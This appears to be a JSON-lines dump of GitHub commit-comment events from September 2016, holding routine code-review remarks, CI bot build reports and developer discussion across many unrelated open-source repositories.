{"id":"4604455850","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19135474,"position":null,"line":null,"path":null,"commit_id":"7fa8aa6a01182cd325d23b58edbb7f42988d16fe","created_at":"2016-09-22T19:06:27Z","updated_at":"2016-09-22T19:06:27Z","body":"really this fix drowning?"}},"created_at":"2016-09-22T19:06:27Z"}
{"id":"4604461290","type":"CommitCommentEvent","actor":{"login":"winniex1"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19135487,"position":5,"line":58,"path":"packages/liotapkg.sh","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T19:07:27Z","updated_at":"2016-09-22T19:07:27Z","body":"1.       Fifo is a temporary solution. Later will replace it.\r\n\r\n2.       In setup.py, copied packages folders to etc/liota/packages;\r\nConsider the user friendly usages, want to put package related staffs there.\r\nFor fifo, it can be other place. Working on make it that way.\r\n\r\n3.       That’s my debugging version, which was somehow checked in. will modify it soon.\r\n\r\nFrom: Charles ZHU <notifications@github.com>\r\nReply-To: vmware/liota <reply@reply.github.com>\r\nDate: Thursday, September 22, 2016 at 12:00 PM\r\nTo: vmware/liota <liota@noreply.github.com>\r\nCc: Winnie Xu <winniex@vmware.com>, Author <author@noreply.github.com>\r\nSubject: Re: [vmware/liota] More fixes based on review commens; use cross-platform psutil to (6b38359)\r\n\r\n\r\nAccording to Linux folder definitions, e.g. http://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/the-root-directory.html<https://urldefense.proofpoint.com/v2/url?u=http-3A__www.tldp.org_LDP_Linux-2DFilesystem-2DHierarchy_html_the-2Droot-2Ddirectory.html&d=CwMFaQ&c=Sqcl0Ez6M0X8aeM67LKIiDJAXVeAw-YihVMNtXt-uEs&r=_Igq7TsbDQ9DBL4rgLuu3rvZfvFUzCyOYfP6NZjJI54&m=8K14xFzcN-2XmpcX47J2ylK7UJnRElj676Zl-Xuwc58&s=5fsmZ4wb0pvgrjvV1fssPVXI-gl1Oz3u5z74gDTOLYg&e=>, /etc is not the correct place to put this FIFO file.\r\n\r\nIn the old liota, this file was in var. I think var or tmp is better.\r\n\r\nWhat's more, why should we even have this line here in this file? This file is designed to read this path from liota.conf I think... Please have a look at the previous version here in my fork: https://github.com/bfrggit/liota/blob/master/aux/liotapkg.sh<https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_bfrggit_liota_blob_master_aux_liotapkg.sh&d=CwMFaQ&c=Sqcl0Ez6M0X8aeM67LKIiDJAXVeAw-YihVMNtXt-uEs&r=_Igq7TsbDQ9DBL4rgLuu3rvZfvFUzCyOYfP6NZjJI54&m=8K14xFzcN-2XmpcX47J2ylK7UJnRElj676Zl-Xuwc58&s=5b0hB6SMNXNx0TXfoawcFMB3q5QQB83xkn8v7rb8E_Q&e=>.\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_vmware_liota_commit_6b38359ba67e59c236ee4d71dce3984e00b9dc9b-23commitcomment-2D19135395&d=CwMFaQ&c=Sqcl0Ez6M0X8aeM67LKIiDJAXVeAw-YihVMNtXt-uEs&r=_Igq7TsbDQ9DBL4rgLuu3rvZfvFUzCyOYfP6NZjJI54&m=8K14xFzcN-2XmpcX47J2ylK7UJnRElj676Zl-Xuwc58&s=1zNkrEkh_CjhCOc2w9l_R5V61U4sVM2LsbpO4faVhNI&e=>, or mute the thread<https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AQ5FBvTLr76IcMpSPzsROR9h59B56r9Mks5qstBfgaJpZM4KDcSb&d=CwMFaQ&c=Sqcl0Ez6M0X8aeM67LKIiDJAXVeAw-YihVMNtXt-uEs&r=_Igq7TsbDQ9DBL4rgLuu3rvZfvFUzCyOYfP6NZjJI54&m=8K14xFzcN-2XmpcX47J2ylK7UJnRElj676Zl-Xuwc58&s=I_EF0ixpaUkehKpjJvvlf1AhW6qf75laRf-QeC23DwU&e=>.\r\n"}},"created_at":"2016-09-22T19:07:27Z"}
{"id":"4604468170","type":"CommitCommentEvent","actor":{"login":"rgbkrk"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":19135503,"position":null,"line":null,"path":null,"commit_id":"bc6d896a29b09f9ce68211507ff9ab66b16fffcd","created_at":"2016-09-22T19:08:42Z","updated_at":"2016-09-22T19:08:42Z","body":"Thanks for catching the one I missed.\r\n\r\nPerhaps this list should be pulled from one spot?"}},"created_at":"2016-09-22T19:08:42Z"}
{"id":"4604470972","type":"CommitCommentEvent","actor":{"login":"oneton"},"repo":{"name":"oneton/OpenSSL-for-iPhone"},"payload":{"comment":{"id":19135512,"position":null,"line":null,"path":null,"commit_id":"0e844b67c04f5d27c644707cae5c620d60483b0d","created_at":"2016-09-22T19:09:13Z","updated_at":"2016-09-22T19:09:13Z","body":"This took too long."}},"created_at":"2016-09-22T19:09:13Z"}
{"id":"4604471939","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135516,"position":null,"line":null,"path":null,"commit_id":"6ae64eb622224bf25caed6a6e858488a383b3ffc","created_at":"2016-09-22T19:09:23Z","updated_at":"2016-09-22T19:09:23Z","body":"Custom buildables and admin spawned base objects are always a possibility and I have played on many servers with them... I will read floors since you are right about vector building."}},"created_at":"2016-09-22T19:09:23Z"}
{"id":"4604473039","type":"CommitCommentEvent","actor":{"login":"MauricioVives"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19135518,"position":null,"line":null,"path":null,"commit_id":"d736bc222321ebcac9aea0d5382ada1a085e7ffa","created_at":"2016-09-22T19:09:28Z","updated_at":"2016-09-22T19:09:28Z","body":"Hey folks,\r\n\r\nI noticed that this rule still fails in the case below.  Is that expected?\r\n\r\n```\r\nswitch( foo )\r\n{\r\n    // Some comment here. <- This will trigger lines-around-comment.\r\n    case 0:\r\n    ...\r\n}\r\n```"}},"created_at":"2016-09-22T19:09:28Z"}
{"id":"4604473420","type":"CommitCommentEvent","actor":{"login":"sebez"},"repo":{"name":"JabX/autofocus"},"payload":{"comment":{"id":19135519,"position":46,"line":46,"path":"src/router.ts","commit_id":"0469e95f0f44aedf285f7dd152597d7c460765ae","created_at":"2016-09-22T19:09:29Z","updated_at":"2016-09-22T19:09:29Z","body":"Pour que la forme de l'URL ne change pas et ne perde pas le nom du répertoire virtuel, une solution est que l'URL de l'application se termine par `/`, et le currentPath commence par `#`."}},"created_at":"2016-09-22T19:09:29Z"}
{"id":"4604475535","type":"CommitCommentEvent","actor":{"login":"BenjaminHae"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135521,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T19:09:49Z","updated_at":"2016-09-22T19:09:49Z","body":"yes, but the other way around. `attacker.com/example.com` as a folder does work. I'd fear `http://` is not a problem."}},"created_at":"2016-09-22T19:09:49Z"}
{"id":"4604477342","type":"CommitCommentEvent","actor":{"login":"ob7"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19135532,"position":null,"line":null,"path":null,"commit_id":"3c038d80d62e32078905b9e904494d748cd66d71","created_at":"2016-09-22T19:10:10Z","updated_at":"2016-09-22T19:10:10Z","body":"Line 14 needs ending semicolon."}},"created_at":"2016-09-22T19:10:10Z"}
{"id":"4604481751","type":"CommitCommentEvent","actor":{"login":"adamopenweb"},"repo":{"name":"webcompat/web-bugs"},"payload":{"comment":{"id":19135543,"position":14,"line":25,"path":"README.md","commit_id":"fce76a47bb6add472b607be8fb14afbd7ba7d059","created_at":"2016-09-22T19:10:58Z","updated_at":"2016-09-22T19:10:58Z","body":"prioritized :)"}},"created_at":"2016-09-22T19:10:58Z"}
{"id":"4604484551","type":"CommitCommentEvent","actor":{"login":"zeruniverse"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135551,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T19:11:30Z","updated_at":"2016-09-22T19:11:30Z","body":"No, 'http://example.com/' must be at the beginning of the referrer to pass the check"}},"created_at":"2016-09-22T19:11:30Z"}
{"id":"4604485966","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19135559,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-22T19:11:46Z","updated_at":"2016-09-22T19:11:46Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1196 of 1196 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T19:11:46Z"}
{"id":"4604488182","type":"CommitCommentEvent","actor":{"login":"StevenGann"},"repo":{"name":"StevenGann/SG16"},"payload":{"comment":{"id":19135566,"position":null,"line":null,"path":null,"commit_id":"4777c5fc9984039b0234fad38c2b63173fdeef8a","created_at":"2016-09-22T19:12:09Z","updated_at":"2016-09-22T19:12:09Z","body":"This program was supposed to demonstrate a primitive array.\r\nWhat it demonstrates best is how much simpler things are when you have labels, which are currently not implemented in the assembler."}},"created_at":"2016-09-22T19:12:09Z"}
{"id":"4604488706","type":"CommitCommentEvent","actor":{"login":"BenjaminHae"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135568,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T19:12:15Z","updated_at":"2016-09-22T19:12:15Z","body":"Alright. Sorry. New rule:i don't try to contribute on workdays. "}},"created_at":"2016-09-22T19:12:15Z"}
{"id":"4604491776","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19135575,"position":null,"line":null,"path":null,"commit_id":"9d193616863cbdc8a7af52633b119ba8711b46a4","created_at":"2016-09-22T19:12:49Z","updated_at":"2016-09-22T19:12:49Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [isoler la stylesheet JBJ qui produit les données d'entrée au template nunjucks](https://trello.com/c/nPhyfkRf/35-isoler-la-stylesheet-jbj-qui-produit-les-donnees-d-entree-au-template-nunjucks)"}},"created_at":"2016-09-22T19:12:49Z"}
{"id":"4604495311","type":"CommitCommentEvent","actor":{"login":"zeruniverse"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135584,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T19:13:28Z","updated_at":"2016-09-22T19:13:28Z","body":"Oh, you're right. I forget the '/'. In config.php I just wrote http://example.com"}},"created_at":"2016-09-22T19:13:28Z"}
{"id":"4604497488","type":"CommitCommentEvent","actor":{"login":"zeruniverse"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135590,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T19:13:53Z","updated_at":"2016-09-22T19:13:53Z","body":"I'll mention it in wiki"}},"created_at":"2016-09-22T19:13:53Z"}
{"id":"4604499792","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19135597,"position":null,"line":null,"path":null,"commit_id":"c9f241e9ab22b8c88ce8cad49e84c4ba1345b219","created_at":"2016-09-22T19:14:18Z","updated_at":"2016-09-22T19:14:18Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c9f241e9ab22b8c88ce8cad49e84c4ba1345b219-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T19:14:18Z"}
{"id":"4604505262","type":"CommitCommentEvent","actor":{"login":"ayumi"},"repo":{"name":"brave/ledger-client"},"payload":{"comment":{"id":19135609,"position":75,"line":172,"path":"README.md","commit_id":"88387f45f38f9bcd8bcd8a2c885f01d9b3f8cd41","created_at":"2016-09-22T19:15:19Z","updated_at":"2016-09-22T19:15:19Z","body":"in this context i dislike `blastoff` and `touchdown` because they're not sufficiently semantic"}},"created_at":"2016-09-22T19:15:19Z"}
{"id":"4604505494","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19135610,"position":null,"line":null,"path":null,"commit_id":"27af9ac3efcea0fd58f6dcc4325eef3ff288783b","created_at":"2016-09-22T19:15:22Z","updated_at":"2016-09-22T19:15:22Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2314 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-27af9ac3efcea0fd58f6dcc4325eef3ff288783b-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-27af9ac3efcea0fd58f6dcc4325eef3ff288783b-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.75%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T19:15:22Z"}
{"id":"4604505770","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19135611,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-22T19:15:25Z","updated_at":"2016-09-22T19:15:25Z","body":"@snicolet Actually this illegal king moves should already be handled correctly by line\r\n`} while (stmAttackers && (nextVictim != KING || (--slIndex, false))); // Stop before a king capture`\r\nnot?"}},"created_at":"2016-09-22T19:15:25Z"}
{"id":"4604508674","type":"CommitCommentEvent","actor":{"login":"alacambra"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19135617,"position":14,"line":14,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-22T19:16:00Z","updated_at":"2016-09-22T19:16:00Z","body":"mir war langweilig und ich habe ein bisschen rumspaziert. Interessierst du die noch für java/java EE?"}},"created_at":"2016-09-22T19:16:00Z"}
{"id":"4604509738","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":19135620,"position":null,"line":null,"path":null,"commit_id":"bc6d896a29b09f9ce68211507ff9ab66b16fffcd","created_at":"2016-09-22T19:16:12Z","updated_at":"2016-09-22T19:16:12Z","body":"That'd be ideal.\r\n\r\nThe `load-context.js` file gets written to the project root (Webpack needs it there) so it could require the `page-file-types` module from the Gatsby install in node_modules.\r\n\r\nThen we could further consolidate things by adding to `page-file-types` if a file is \"static\" (e.g. needs wrapped by a react component) or not (is a react component itself).\r\n\r\nWant to take this on?"}},"created_at":"2016-09-22T19:16:12Z"}
{"id":"4604510527","type":"CommitCommentEvent","actor":{"login":"captainviet"},"repo":{"name":"itsnhduc/24Hrs"},"payload":{"comment":{"id":19135624,"position":null,"line":null,"path":null,"commit_id":"53b7895cd69beeef0914bcd4fe934d174ab92fca","created_at":"2016-09-22T19:16:21Z","updated_at":"2016-09-22T19:16:21Z","body":"# Buliding basic framework for the Chatbox API module and the Chatbox UI elements\r\n## Chatbox API\r\n\r\n- _chatboxes.js_ - instantiating the table Chatbox for storing chat messages and relevant information\r\n- _methods.js_ - defining the methods for manipulating the table Chatbox (CRUD)\r\n- _server/publication.js_ - restricting the scope of the database that the client is allowed to access\r\n\r\n## Chatbox UI\r\n\r\n- _chat-tab.html_ - template for single chat tab\r\n- _chat-tab-list.html_ - template for passing data to chat tabs\r\n- _chat-tab-list.js_ - helper method and event handlers for chat tabs\r\n- _chatbox.html_ - template for the chatbox page\r\n- _chatbox.js_ - helper method and event handlers for chatbox page\r\n- _index.js_ - store path name of all _.js_ file within the directory for concise reference\r\n- _message.html_ - template for single message within chat\r\n- _message-history.html_ - template for passing data to messages\r\n- _message-history.js_ - helper method and event handlers for the message display component"}},"created_at":"2016-09-22T19:16:21Z"}
{"id":"4604514704","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/ledger-client"},"payload":{"comment":{"id":19135637,"position":75,"line":172,"path":"README.md","commit_id":"88387f45f38f9bcd8bcd8a2c885f01d9b3f8cd41","created_at":"2016-09-22T19:17:10Z","updated_at":"2016-09-22T19:17:10Z","body":"well, they are described in the `README` file. blastoff is something a rocket does at the beginning of the cycle, and `touchdown` is what it does at the end of the cycle..."}},"created_at":"2016-09-22T19:17:10Z"}
{"id":"4604516580","type":"CommitCommentEvent","actor":{"login":"ayumi"},"repo":{"name":"brave/ledger-client"},"payload":{"comment":{"id":19135642,"position":31,"line":94,"path":"README.md","commit_id":"88387f45f38f9bcd8bcd8a2c885f01d9b3f8cd41","created_at":"2016-09-22T19:17:32Z","updated_at":"2016-09-22T19:17:32Z","body":"would be helpful to have the syntax of the returned `result`"}},"created_at":"2016-09-22T19:17:32Z"}
{"id":"4604518264","type":"CommitCommentEvent","actor":{"login":"sledgehammer999"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":19135650,"position":null,"line":null,"path":null,"commit_id":"4da05e5914db73bf1d3a347be609ba8d3464a4db","created_at":"2016-09-22T19:17:51Z","updated_at":"2016-09-22T19:17:51Z","body":"I am not sure what you're talking about. I have used **final** release of NSIS 3.0 (no betas/alphas) and UAC plugin version **0.2.4c**. I think older versions of that plugin don't work with nsis 3.0 final.\r\n\r\nAre you using the above versions?"}},"created_at":"2016-09-22T19:17:51Z"}
{"id":"4604519192","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19135661,"position":26,"line":22,"path":"index.html","commit_id":"b31bfd002a6b665d4f7d86191036c198b1b312ec","created_at":"2016-09-22T19:18:04Z","updated_at":"2016-09-22T19:18:04Z","body":"это то о чем я говорила ранее - http://joxi.ru/bmoxM9vfMVa0w2 ,элементы с float: right имеют свойство менять порядок расположения элементов в потоке. То есть элемент, который идет первым в разметке - будет последним в потоке. Чтобы решить это - вам нужно в разметке поменять блоки местами."}},"created_at":"2016-09-22T19:18:04Z"}
{"id":"4604524145","type":"CommitCommentEvent","actor":{"login":"adelbertc"},"repo":{"name":"adelbertc/faq"},"payload":{"comment":{"id":19135672,"position":277,"line":277,"path":"src/main/tut/subtype-typeclasses.compiled.md","commit_id":"2e8c7953422401879c5cfcf3ffc2d24675ec0fd8","created_at":"2016-09-22T19:18:56Z","updated_at":"2016-09-22T19:18:56Z","body":"Ah interesting, I didn't know that, thanks! Will edit soon."}},"created_at":"2016-09-22T19:18:56Z"}
{"id":"4604532063","type":"CommitCommentEvent","actor":{"login":"yusefnapora"},"repo":{"name":"mediachain/aleph"},"payload":{"comment":{"id":19135688,"position":23,"line":21,"path":"src/peer/base_node.js","commit_id":"0f0cb5dedca6e56207cd525309b4fd1f2c85b230","created_at":"2016-09-22T19:20:25Z","updated_at":"2016-09-22T19:20:25Z","body":"for some reason flow gives me an unexpected token error if I leave out the semicolons here... but it doesn't mind if I leave them out in e.g. the MediachainNode class...  ¯\\_(ツ)_/¯"}},"created_at":"2016-09-22T19:20:25Z"}
{"id":"4604533870","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19135694,"position":null,"line":null,"path":null,"commit_id":"6c556a3257a1ae101a5a16b56895838c0a165a4e","created_at":"2016-09-22T19:20:45Z","updated_at":"2016-09-22T19:20:45Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 256](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1217&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:26:44"}},"created_at":"2016-09-22T19:20:45Z"}
{"id":"4604533968","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19135695,"position":null,"line":null,"path":null,"commit_id":"70345e281510e401e89ae90ac08acd2ce6ef4e7d","created_at":"2016-09-22T19:20:46Z","updated_at":"2016-09-22T19:20:46Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 257](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1218&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-22T19:20:46Z"}
{"id":"4604534095","type":"CommitCommentEvent","actor":{"login":"ExSport"},"repo":{"name":"kodi-czsk/plugin.video.sosac.ph"},"payload":{"comment":{"id":19135696,"position":null,"line":null,"path":null,"commit_id":"224d227be7a3710ae683012389e3f3cb5cb3ed1a","created_at":"2016-09-22T19:20:47Z","updated_at":"2016-09-22T19:20:47Z","body":"Vytvoren pull #80 "}},"created_at":"2016-09-22T19:20:47Z"}
{"id":"4604540752","type":"CommitCommentEvent","actor":{"login":"drift97"},"repo":{"name":"alexcoolgandy/BSUIR"},"payload":{"comment":{"id":19135704,"position":1,"line":1,"path":"Пока лошара","commit_id":"1a8ee235236aeb39c8d86074657ae56cd520f401","created_at":"2016-09-22T19:22:02Z","updated_at":"2016-09-22T19:22:02Z","body":"ГАД ТЫ"}},"created_at":"2016-09-22T19:22:02Z"}
{"id":"4604543034","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19135716,"position":null,"line":null,"path":null,"commit_id":"2f11f0defa72a264cda17629413bd0aa779eb807","created_at":"2016-09-22T19:22:28Z","updated_at":"2016-09-22T19:22:28Z","body":"Not in this special case, because correct pinners were introduced as fix (bounds [-3;1]) \r\nso the according sanity check has to be done with [0;4]."}},"created_at":"2016-09-22T19:22:28Z"}
{"id":"4604544984","type":"CommitCommentEvent","actor":{"login":"fuzun"},"repo":{"name":"fuzun/xash3d"},"payload":{"comment":{"id":19135723,"position":5,"line":1044,"path":"engine/client/gl_vidnt.c","commit_id":"d152452e72af8f7d303f68834f23dde3d89c4797","created_at":"2016-09-22T19:22:51Z","updated_at":"2016-09-22T19:22:51Z","body":"**Warning\tC4047**\t'function': 'LONG' differs in levels of indirection from 'HICON'\r\n**Warning\tC4024**\t'SetClassLongA': different types for formal and actual parameter \r\n\r\nType compatible?"}},"created_at":"2016-09-22T19:22:51Z"}
{"id":"4604546076","type":"CommitCommentEvent","actor":{"login":"TheBeardedLlama"},"repo":{"name":"SLQSignatureProgram/Fun-Palaces-Comic-Maker"},"payload":{"comment":{"id":19135725,"position":null,"line":null,"path":null,"commit_id":"905e73aae181b2157b9644863298328d362dda88","created_at":"2016-09-22T19:23:03Z","updated_at":"2016-09-22T19:23:03Z","body":"this commit resolved issue #1 "}},"created_at":"2016-09-22T19:23:03Z"}
{"id":"4604552571","type":"CommitCommentEvent","actor":{"login":"captainviet"},"repo":{"name":"itsnhduc/24Hrs"},"payload":{"comment":{"id":19135744,"position":null,"line":null,"path":null,"commit_id":"848458e13c1c9ef6e78d7b36547c2b8c1e6d77b1","created_at":"2016-09-22T19:24:14Z","updated_at":"2016-09-22T19:24:14Z","body":"# Fix Database (Chatbox) manipulation method (CRUD) and Call from the Client\r\n## Chatbox CRUD\r\n\r\n- Restructure Chatbox's schema\r\n- Fix bugs `chatbox.sendMessage failed to deliver message`\r\n- Minor changes to methods such as _chatbox.insert_ and _chatbox.isMaxTab_\r\n- Fix bugs `Meteor server methods are not defined`\r\n\r\n## Client Call\r\n\r\n- Rewrite `submit .new-message` method for posting message content to MongoDB "}},"created_at":"2016-09-22T19:24:14Z"}
{"id":"4604555552","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19135749,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-22T19:24:48Z","updated_at":"2016-09-22T19:24:48Z","body":"Leave it in. I check on weekend if I can build that package and then add it to feed."}},"created_at":"2016-09-22T19:24:48Z"}
{"id":"4604555933","type":"CommitCommentEvent","actor":{"login":"Lance-Inman"},"repo":{"name":"Lance-Inman/project-1"},"payload":{"comment":{"id":19135752,"position":null,"line":null,"path":null,"commit_id":"a2525f19670e65d606cb67e547de6af2d72dffd6","created_at":"2016-09-22T19:24:52Z","updated_at":"2016-09-22T19:24:52Z","body":"Vertex.java\r\n- Separated into individual class file and encapsulated\r\n- Added conflicts variable (updated each time setColor() is called via updateConflicts())\r\n- Removed connectedToClosestNeighbor and ClosestNeighbor variable (I was generating graphs wrong and don't need this)\r\n\r\nGraph.java\r\n- Added connectGraph() which connects the graph as stated in the assignment\r\n- Updated intersects() so that it no longer returns true when two line segments share a single point\r\n- Removed populateClosestNeighbors() and connectClosestNeighbors() (not used in new graph generation)\r\nIssues: intersects() returns false when one line segment is contained within another line segment (ex: line segment (0,0)-(0,1) should intersect line segment (0,0)-(0,2) but intersect() returns false; Graph is not encapsulated\r\n\r\nSolver.java\r\n- Made solve() throw a UnsolvableGraphException() when the graph can not be solved\r\n- Changed getTicks() to getNumDecisions()\r\n\r\nUnsolvableGraphException.java\r\n- Initial commit\r\n\r\nGraphColorer.java\r\n- Initial commit (not finished)\r\n- Includes an incomplete console interface for generating, solving, and printing graphs\r\n\r\nMinConflictsSolver.java\r\n- Initial commit\r\n- Attempts to solve graphs using Min-conflicts until maxTicks is reached"}},"created_at":"2016-09-22T19:24:52Z"}
{"id":"4604566362","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19135769,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-22T19:26:48Z","updated_at":"2016-09-22T19:26:48Z","body":"Its locked until we considered better solutions than letting everybody fiddling for himself.\r\nI dislike profile based yaml because we can do it more centralized with less maintenance."}},"created_at":"2016-09-22T19:26:48Z"}
{"id":"4604573639","type":"CommitCommentEvent","actor":{"login":"selltc"},"repo":{"name":"davidker/unisys"},"payload":{"comment":{"id":19135778,"position":null,"line":null,"path":null,"commit_id":"3d7ad09bb5de4379cdd4d6f109cc6e38c938c551","created_at":"2016-09-22T19:28:11Z","updated_at":"2016-09-22T19:28:11Z","body":"Re:\r\n```\r\n struct ultra_vbus_deviceinfo {\r\n \tu8 devtype[16];\t\t/* short string identifying the device type */\r\n \tu8 drvname[16];\t\t/* driver .sys file name */\r\n-\tu8 infostrs[96];\t/* sequence of tab-delimited id strings: */\r\n-\t/* <DRIVER_REV> <DRIVER_VERTAG> <DRIVER_COMPILETIME> */\r\n+\tu8 infostrs[96];\t/* kernel version */\r\n \tu8 reserved[128];\t/* pad size to 256 bytes */\r\n };\r\n```\r\nI think we should leave the `sequence of tab-delimited id strings` comment, because that's what the s-Par back-end is expecting in this field.  For our Linux upstream guest particular usage of this field, we just-so happen to be filling in the kernel version, so you can add that info too if you want.\r\n\r\nRe:\r\n```\r\n \tsnprintf(bus_device_info_ptr->infostrs,\r\n-\t\t sizeof(bus_device_info_ptr->infostrs), \"%s\\t%s\\t%s\",\r\n-\t\t (ver) ? ver : \"unknownVer\",\r\n-\t\t (ver_tag) ? ver_tag : \"unknownVerTag\",\r\n-\t\t TARGET_HOSTNAME);\r\n+\t\t sizeof(bus_device_info_ptr->infostrs), \"kernel version\\t%s\",\r\n+\t\t (ver) ? ver : \"unknownVer\");\r\n }\r\n```\r\nI do NOT thing you should separate \"kernel version\" from the version string by a tab.  Reason is, tab is supposed to be a delimiter between various version fields.  So I think a space would be more appropriate.\r\n"}},"created_at":"2016-09-22T19:28:11Z"}
